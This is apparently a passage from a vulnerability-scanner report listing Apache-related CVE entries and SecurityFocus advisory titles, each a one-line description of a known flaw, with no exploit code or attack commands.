14404| [CVE-2000-1016] The default configuration of Apache (httpd.conf) on SuSE 6.4 includes an alias for the /usr/doc directory, which allows remote attackers to read package documentation and obtain system configuration information via an HTTP request for the /doc/packages URL.
14405| [CVE-2000-0913] mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.
14406| [CVE-2000-0883] The default configuration of mod_perl for Apache as installed on Mandrake Linux 6.1 through 7.1 sets the /perl/ directory to be browseable, which allows remote attackers to list the contents of that directory.
14407| [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary diretories via the PROPFIND HTTP request method.
14408| [CVE-2000-0868] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.
14409| [CVE-2000-0791] Trustix installs the httpsd program for Apache-SSL with world-writeable permissions, which allows local users to replace it with a Trojan horse.
14410| [CVE-2000-0760] The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
14411| [CVE-2000-0759] Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.
14412| [CVE-2000-0628] The source.asp example script in the Apache ASP module Apache::ASP 1.93 and earlier allows remote attackers to modify files.
14413| [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.
14414| [CVE-1999-1412] A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.
14415| [CVE-1999-1293] mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.
14416| [CVE-1999-1237] Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.
14417| [CVE-1999-1199] Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.
14418| [CVE-1999-1053] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
14419| [CVE-1999-0926] Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.
14420| [CVE-1999-0678] A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.
14421| [CVE-1999-0448] IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
14422| [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
14423| [CVE-1999-0236] ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.
14424| [CVE-1999-0107] Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.
14425| [CVE-1999-0071] Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.
14426|
14427| SecurityFocus - https://www.securityfocus.com/bid/:
14428| [104554] Apache HBase CVE-2018-8025 Security Bypass Vulnerability
14429| [104465] Apache Geode CVE-2017-15695 Remote Code Execution Vulnerability
14430| [104418] Apache Storm CVE-2018-8008 Arbitrary File Write Vulnerability
14431| [104399] Apache Storm CVE-2018-1332 User Impersonation Vulnerability
14432| [104348] Apache UIMA CVE-2017-15691 XML External Entity Injection Vulnerability
14433| [104313] Apache NiFi XML External Entity Injection and Denial of Service Vulnerability
14434| [104259] Apache Geode CVE-2017-12622 Authorization Bypass Vulnerability
14435| [104257] Apache Sling XSS Protection API CVE-2017-15717 Cross Site Scripting Vulnerability
14436| [104253] Apache ZooKeeper CVE-2018-8012 Security Bypass Vulnerability
14437| [104252] Apache Batik CVE-2018-8013 Information Disclosure Vulnerability
14438| [104239] Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities
14439| [104215] Apache ORC CVE-2018-8015 Denial of Service Vulnerability
14440| [104203] Apache Tomcat CVE-2018-8014 Security Bypass Vulnerability
14441| [104161] Apache Ambari CVE-2018-8003 Directory Traversal Vulnerability
14442| [104140] Apache Derby CVE-2018-1313 Security Bypass Vulnerability
14443| [104135] Apache Tika CVE-2018-1338 Denial of Service Vulnerability
14444| [104008] Apache Fineract CVE-2018-1291 SQL Injection Vulnerability
14445| [104007] Apache Fineract CVE-2018-1292 SQL Injection Vulnerability
14446| [104005] Apache Fineract CVE-2018-1289 SQL Injection Vulnerability
14447| [104001] Apache Tika CVE-2018-1335 Remote Command Injection Vulnerability
14448| [103975] Apache Fineract CVE-2018-1290 SQL Injection Vulnerability
14449| [103974] Apache Solr CVE-2018-1308 XML External Entity Injection Vulnerability
14450| [103772] Apache Traffic Server CVE-2017-7671 Denial of Service Vulnerability
14451| [103770] Apache Traffic Server CVE-2017-5660 Security Bypass Vulnerability
14452| [103751] Apache Hive CVE-2018-1282 SQL Injection Vulnerability
14453| [103750] Apache Hive CVE-2018-1284 Security Bypass Vulnerability
14454| [103692] Apache Ignite CVE-2018-1295 Arbitrary Code Execution Vulnerability
14455| [103528] Apache HTTP Server CVE-2018-1302 Denial of Service Vulnerability
14456| [103525] Apache HTTP Server CVE-2017-15715 Remote Security Bypass Vulnerability
14457| [103524] Apache HTTP Server CVE-2018-1312 Remote Security Bypass Vulnerability
14458| [103522] Apache HTTP Server CVE-2018-1303 Denial of Service Vulnerability
14459| [103520] Apache HTTP Server CVE-2018-1283 Remote Security Vulnerability
14460| [103516] Apache Struts CVE-2018-1327 Denial of Service Vulnerability
14461| [103515] Apache HTTP Server CVE-2018-1301 Denial of Service Vulnerability
14462| [103512] Apache HTTP Server CVE-2017-15710 Denial of Service Vulnerability
14463| [103508] Apache Syncope CVE-2018-1321 Multiple Remote Code Execution Vulnerabilities
14464| [103507] Apache Syncope CVE-2018-1322 Multiple Information Disclosure Vulnerabilities
14465| [103490] Apache Commons Compress CVE-2018-1324 Multiple Denial Of Service Vulnerabilities
14466| [103434] APACHE Allura CVE-2018-1319 HTTP Response Splitting Vulnerability
14467| [103389] Apache Tomcat JK Connector CVE-2018-1323 Directory Traversal Vulnerability
14468| [103222] Apache CloudStack CVE-2013-4317 Information Disclosure Vulnerability
14469| [103219] Apache Xerces-C CVE-2017-12627 Null Pointer Dereference Denial of Service Vulnerability
14470| [103206] Apache Geode CVE-2017-15693 Remote Code Execution Vulnerability
14471| [103205] Apache Geode CVE-2017-15692 Remote Code Execution Vulnerability
14472| [103170] Apache Tomcat CVE-2018-1304 Security Bypass Vulnerability
14473| [103144] Apache Tomcat CVE-2018-1305 Security Bypass Vulnerability
14474| [103102] Apache Oozie CVE-2017-15712 Information Disclosure Vulnerability
14475| [103098] Apache Karaf CVE-2016-8750 LDAP Injection Vulnerability
14476| [103069] Apache Tomcat CVE-2017-15706 Remote Security Weakness
14477| [103068] Apache JMeter CVE-2018-1287 Security Bypass Vulnerability
14478| [103067] Apache Qpid Dispatch Router 'router_core/connections.c' Denial of Service Vulnerability
14479| [103036] Apache CouchDB CVE-2017-12636 Remote Code Execution Vulnerability
14480| [103025] Apache Thrift CVE-2016-5397 Remote Command Injection Vulnerability
14481| [102879] Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities
14482| [102842] Apache NiFi CVE-2017-12632 Host Header Injection Vulnerability
14483| [102815] Apache NiFi CVE-2017-15697 Multiple Cross Site Scripting Vulnerabilities
14484| [102488] Apache Geode CVE-2017-9795 Remote Code Execution Vulnerability
14485| [102229] Apache Sling CVE-2017-15700 Information Disclosure Vulnerability
14486| [102226] Apache Drill CVE-2017-12630 Cross Site Scripting Vulnerability
14487| [102154] Multiple Apache Products CVE-2017-15708 Remote Code Execution Vulnerability
14488| [102127] Apache CXF Fediz CVE-2017-12631 Multiple Cross Site Request Forgery Vulnerabilities
14489| [102041] Apache Qpid Broker-J CVE-2017-15701 Denial of Service Vulnerability
14490| [102040] Apache Qpid Broker CVE-2017-15702 Security Weakness
14491| [102021] Apache Struts CVE-2017-15707 Denial of Service Vulnerability
14492| [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
14493| [101876] Apache Camel CVE-2017-12634 Deserialization Remote Code Execution Vulnerability
14494| [101874] Apache Camel CVE-2017-12633 Deserialization Remote Code Execution Vulnerability
14495| [101872] Apache Karaf CVE-2014-0219 Local Denial of Service Vulnerability
14496| [101868] Apache CouchDB CVE-2017-12635 Remote Privilege Escalation Vulnerability
14497| [101859] Apache CXF CVE-2017-12624 Denial of Service Vulnerability
14498| [101844] Apache Sling Servlets Post CVE-2017-11296 Cross Site Scripting Vulnerability
14499| [101686] Apache Hive CVE-2017-12625 Information Disclosure Vulnerability
14500| [101644] Apache Wicket CVE-2012-5636 Cross Site Scripting Vulnerability
14501| [101631] Apache Traffic Server CVE-2015-3249 Multiple Remote Code Execution Vulnerabilities
14502| [101630] Apache Traffic Server CVE-2014-3624 Access Bypass Vulnerability
14503| [101625] Apache jUDDI CVE-2009-1197 Security Bypass Vulnerability
14504| [101623] Apache jUDDI CVE-2009-1198 Cross Site Scripting Vulnerability
14505| [101620] Apache Subversion 'libsvn_fs_fs/fs_fs.c' Denial of Service Vulnerability
14506| [101585] Apache OpenOffice Multiple Remote Code Execution Vulnerabilities
14507| [101577] Apache Wicket CVE-2016-6806 Cross Site Request Forgery Vulnerability
14508| [101575] Apache Wicket CVE-2014-0043 Information Disclosure Vulnerability
14509| [101570] Apache Geode CVE-2017-9797 Information Disclosure Vulnerability
14510| [101562] Apache Derby CVE-2010-2232 Arbitrary File Overwrite Vulnerability
14511| [101560] Apache Portable Runtime Utility CVE-2017-12613 Multiple Information Disclosure Vulnerabilities
14512| [101558] Apache Portable Runtime Utility Local Out-of-Bounds Read Denial of Service Vulnerability
14513| [101532] Apache James CVE-2017-12628 Arbitrary Command Execution Vulnerability
14514| [101516] Apache HTTP Server CVE-2017-12171 Security Bypass Vulnerability
14515| [101261] Apache Solr/Lucene CVE-2017-12629 Information Disclosure and Remote Code Execution Vulnerabilities
14516| [101230] Apache Roller CVE-2014-0030 XML External Entity Injection Vulnerability
14517| [101173] Apache IMPALA CVE-2017-9792 Information Disclosure Vulnerability
14518| [101052] Apache Commons Jelly CVE-2017-12621 Security Bypass Vulnerability
14519| [101027] Apache Mesos CVE-2017-7687 Denial of Service Vulnerability
14520| [101023] Apache Mesos CVE-2017-9790 Denial of Service Vulnerability
14521| [100954] Apache Tomcat CVE-2017-12617 Incomplete Fix Remote Code Execution Vulnerability
14522| [100946] Apache Wicket CVE-2014-7808 Cross Site Request Forgery Vulnerability
14523| [100901] Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability
14524| [100897] Apache Tomcat CVE-2017-12616 Information Disclosure Vulnerability
14525| [100880] Apache Directory LDAP API CVE-2015-3250 Unspecified Information Disclosure Vulnerability
14526| [100872] Apache HTTP Server CVE-2017-9798 Information Disclosure Vulnerability
14527| [100870] Apache Solr CVE-2017-9803 Remote Privilege Escalation Vulnerability
14528| [100859] puppetlabs-apache CVE-2017-2299 Information Disclosure Vulnerability
14529| [100829] Apache Struts CVE-2017-12611 Remote Code Execution Vulnerability
14530| [100823] Apache Spark CVE-2017-12612 Deserialization Remote Code Execution Vulnerability
14531| [100612] Apache Struts CVE-2017-9804 Incomplete Fix Denial of Service Vulnerability
14532| [100611] Apache Struts CVE-2017-9793 Denial of Service Vulnerability
14533| [100609] Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability
14534| [100587] Apache Atlas CVE-2017-3155 Cross Frame Scripting Vulnerability
14535| [100581] Apache Atlas CVE-2017-3154 Information Disclosure Vulnerability
14536| [100578] Apache Atlas CVE-2017-3153 Cross Site Scripting Vulnerability
14537| [100577] Apache Atlas CVE-2017-3152 Cross Site Scripting Vulnerability
14538| [100547] Apache Atlas CVE-2017-3151 HTML Injection Vulnerability
14539| [100536] Apache Atlas CVE-2017-3150 Cross Site Scripting Vulnerability
14540| [100449] Apache Pony Mail CVE-2016-4460 Authentication Bypass Vulnerability
14541| [100447] Apache2Triad Multiple Security Vulnerabilities
14542| [100284] Apache Sling Servlets Post CVE-2017-9802 Cross Site Scripting Vulnerability
14543| [100280] Apache Tomcat CVE-2017-7674 Security Bypass Vulnerability
14544| [100259] Apache Subversion CVE-2017-9800 Remote Command Execution Vulnerability
14545| [100256] Apache Tomcat CVE-2017-7675 Directory Traversal Vulnerability
14546| [100235] Apache Storm CVE-2017-9799 Remote Code Execution Vulnerability
14547| [100082] Apache Commons Email CVE-2017-9801 SMTP Header Injection Vulnerability
14548| [99873] Apache Sling XSS Protection API CVE-2016-6798 XML External Entity Injection Vulnerability
14549| [99870] Apache Sling API CVE-2016-5394 Cross Site Scripting Vulnerability
14550| [99603] Apache Spark CVE-2017-7678 Cross Site Scripting Vulnerability
14551| [99592] Apache OpenMeetings CVE-2017-7685 Security Bypass Vulnerability
14552| [99587] Apache OpenMeetings CVE-2017-7673 Security Bypass Vulnerability
14553| [99586] Apache OpenMeetings CVE-2017-7688 Security Bypass Vulnerability
14554| [99584] Apache OpenMeetings CVE-2017-7684 Denial of Service Vulnerability
14555| [99577] Apache OpenMeetings CVE-2017-7663 Cross Site Scripting Vulnerability
14556| [99576] Apache OpenMeetings CVE-2017-7664 XML External Entity Injection Vulnerability
14557| [99569] Apache HTTP Server CVE-2017-9788 Memory Corruption Vulnerability
14558| [99568] Apache HTTP Server CVE-2017-9789 Denial of Service Vulnerability
14559| [99563] Apache Struts CVE-2017-7672 Denial of Service Vulnerability
14560| [99562] Apache Struts Spring AOP Functionality Denial of Service Vulnerability
14561| [99509] Apache Impala CVE-2017-5652 Information Disclosure Vulnerability
14562| [99508] Apache IMPALA CVE-2017-5640 Authentication Bypass Vulnerability
14563| [99486] Apache Traffic Control CVE-2017-7670 Denial of Service Vulnerability
14564| [99485] Apache Solr CVE-2017-7660 Security Bypass Vulnerability
14565| [99484] Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability
14566| [99292] Apache Ignite CVE-2017-7686 Information Disclosure Vulnerability
14567| [99170] Apache HTTP Server CVE-2017-7679 Buffer Overflow Vulnerability
14568| [99137] Apache HTTP Server CVE-2017-7668 Denial of Service Vulnerability
14569| [99135] Apache HTTP Server CVE-2017-3167 Authentication Bypass Vulnerability
14570| [99134] Apache HTTP Server CVE-2017-3169 Denial of Service Vulnerability
14571| [99132] Apache HTTP Server CVE-2017-7659 Denial of Service Vulnerability
14572| [99112] Apache Thrift CVE-2015-3254 Denial of Service Vulnerability
14573| [99067] Apache Ranger CVE-2016-8751 HTML Injection Vulnerability
14574| [99018] Apache NiFi CVE-2017-7667 Cross Frame Scripting Vulnerability
14575| [99009] Apache NiFi CVE-2017-7665 Cross Site Scripting Vulnerability
14576| [98961] Apache Ranger CVE-2017-7677 Security Bypass Vulnerability
14577| [98958] Apache Ranger CVE-2017-7676 Security Bypass Vulnerability
14578| [98888] Apache Tomcat CVE-2017-5664 Security Bypass Vulnerability
14579| [98814] Apache Zookeeper CVE-2017-5637 Denial of Service Vulnerability
14580| [98795] Apache Hadoop CVE-2017-7669 Remote Privilege Escalation Vulnerability
14581| [98739] Apache Knox CVE-2017-5646 User Impersonation Vulnerability
14582| [98669] Apache Hive CVE-2016-3083 Security Bypass Vulnerability
14583| [98646] Apache Atlas CVE-2016-8752 Information Disclosure Vulnerability
14584| [98570] Apache Archiva CVE-2017-5657 Multiple Cross-Site Request Forgery Vulnerabilities
14585| [98489] Apache CXF Fediz CVE-2017-7661 Multiple Cross Site Request Forgery Vulnerabilities
14586| [98485] Apache CXF Fediz CVE-2017-7662 Cross Site Request Forgery Vulnerability
14587| [98466] Apache Ambari CVE-2017-5655 Insecure Temporary File Handling Vulnerability
14588| [98365] Apache Cordova For Android CVE-2016-6799 Information Disclosure Vulnerability
14589| [98025] Apache Hadoop CVE-2017-3161 Cross Site Scripting Vulnerability
14590| [98017] Apache Hadoop CVE-2017-3162 Input Validation Vulnerability
14591| [97971] Apache CXF CVE-2017-5656 Information Disclosure Vulnerability
14592| [97968] Apache CXF CVE-2017-5653 Spoofing Vulnerability
14593| [97967] Apache ActiveMQ CVE-2015-7559 Denial of Service Vulnerability
14594| [97949] Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability
14595| [97948] Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
14596| [97947] Apache FOP CVE-2017-5661 XML External Entity Information Disclosure Vulnerability
14597| [97945] Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability
14598| [97702] Apache Log4j CVE-2017-5645 Remote Code Execution Vulnerability
14599| [97582] Apache CXF CVE-2016-6812 Cross Site Scripting Vulnerability
14600| [97579] Apache CXF JAX-RS CVE-2016-8739 XML External Entity Injection Vulnerability
14601| [97544] Apache Tomcat CVE-2017-5651 Information Disclosure Vulnerability
14602| [97531] Apache Tomcat CVE-2017-5650 Denial of Service Vulnerability
14603| [97530] Apache Tomcat CVE-2017-5648 Information Disclosure Vulnerability
14604| [97509] Apache Ignite CVE-2016-6805 Information Disclosure and XML External Entity Injection Vulnerabilities
14605| [97383] Apache Flex BlazeDS CVE-2017-5641 Remote Code Execution Vulnerability
14606| [97378] Apache Geode CVE-2017-5649 Information Disclosure Vulnerability
14607| [97229] Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
14608| [97226] Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
14609| [97184] Apache Ambari CVE-2016-6807 Remote Command Execution Vulnerability
14610| [97179] Apache Camel CVE-2016-8749 Java Deserialization Multiple Remote Code Execution Vulnerabilities
14611| [96983] Apache POI CVE-2017-5644 Denial Of Service Vulnerability
14612| [96895] Apache Tomcat CVE-2016-8747 Information Disclosure Vulnerability
14613| [96731] Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
14614| [96730] Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
14615| [96729] Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
14616| [96540] IBM Development Package for Apache Spark CVE-2016-4970 Denial of Service Vulnerability
14617| [96398] Apache CXF CVE-2017-3156 Information Disclosure Vulnerability
14618| [96321] Apache Camel CVE-2017-3159 Remote Code Execution Vulnerability
14619| [96293] Apache Tomcat 'http11/AbstractInputBuffer.java' Denial of Service Vulnerability
14620| [96228] Apache Brooklyn Cross Site Request Forgery and Multiple Cross Site Scripting Vulnerabilities
14621| [95998] Apache Ranger CVE-2016-8746 Security Bypass Vulnerability
14622| [95929] Apache Groovy CVE-2016-6497 Information Disclosure Vulnerability
14623| [95838] Apache Cordova For Android CVE-2017-3160 Man in the Middle Security Bypass Vulnerability
14624| [95675] Apache Struts Remote Code Execution Vulnerability
14625| [95621] Apache NiFi CVE-2106-8748 Cross Site Scripting Vulnerability
14626| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
14627| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
14628| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
14629| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
14630| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
14631| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
14632| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
14633| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
14634| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
14635| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
14636| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
14637| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
14638| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
14639| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
14640| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
14641| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
14642| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
14643| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
14644| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
14645| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
14646| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
14647| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
14648| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
14649| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
14650| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
14651| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
14652| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
14653| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
14654| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
14655| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
14656| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
14657| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
14658| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
14659| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
14660| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
14661| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
14662| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
14663| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
14664| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
14665| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
14666| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
14667| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
14668| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
14669| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
14670| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
14671| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
14672| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
14673| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
14674| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
14675| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
14676| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
14677| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
14678| [91736] Apache XML-RPC Multiple Security Vulnerabilities
14679| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
14680| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
14681| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
14682| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
14683| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
14684| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
14685| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
14686| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
14687| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
14688| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
14689| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
14690| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
14691| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
14692| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
14693| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
14694| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
14695| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
14696| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
14697| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
14698| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
14699| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
14700| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
14701| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
14702| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
14703| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
14704| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
14705| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
14706| [90482] Apache CVE-2004-1387 Local Security Vulnerability
14707| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
14708| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
14709| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
14710| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
14711| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
14712| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
14713| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
14714| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
14715| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
14716| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
14717| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
14718| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
14719| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
14720| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
14721| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
14722| [86399] Apache CVE-2007-1743 Local Security Vulnerability
14723| [86397] Apache CVE-2007-1742 Local Security Vulnerability
14724| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
14725| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
14726| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
14727| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
14728| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
14729| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
14730| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
14731| [85755] Apache Jetspeed CVE-2016-0711 Mulitple HTML Injection Vulnerabilities
14732| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
14733| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
14734| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
14735| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
14736| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
14737| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
14738| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
14739| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
14740| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
14741| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
14742| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
14743| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
14744| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
14745| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
14746| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
14747| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
14748| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
14749| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
14750| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
14751| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
14752| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
14753| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
14754| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
14755| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
14756| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
14757| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
14758| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
